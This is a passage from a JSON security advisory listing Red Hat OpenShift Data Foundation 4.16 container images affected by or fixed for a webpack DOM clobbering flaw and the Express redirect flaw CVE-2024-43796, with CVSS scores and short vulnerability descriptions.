"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
